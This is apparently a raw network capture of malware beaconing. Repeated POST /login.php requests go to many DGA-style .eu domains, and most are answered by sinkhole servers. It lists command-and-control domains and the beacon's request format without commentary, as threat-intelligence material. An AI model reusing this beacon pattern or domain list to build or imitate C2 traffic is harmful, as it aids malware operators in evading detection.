User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digivehusyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=ce7ab289f22cebe2321038bc925a787f; Expires=Sun, 03 Sep 2023 05:29:48 GMT
Date: Sun, 04 Sep 2016 05:29:48 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:23 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:43 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:44 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:32 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:17 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:15 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:32 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:23 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2016 05:29:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: sinkhole
51..sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...0..HTTP/1.1 200 OK..Server: nginx..Date: Sun, 04 Sep 2016 05:29:48 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Server: sinkhole..51..sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:45 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:52 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:07 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:15 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:27 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
Map
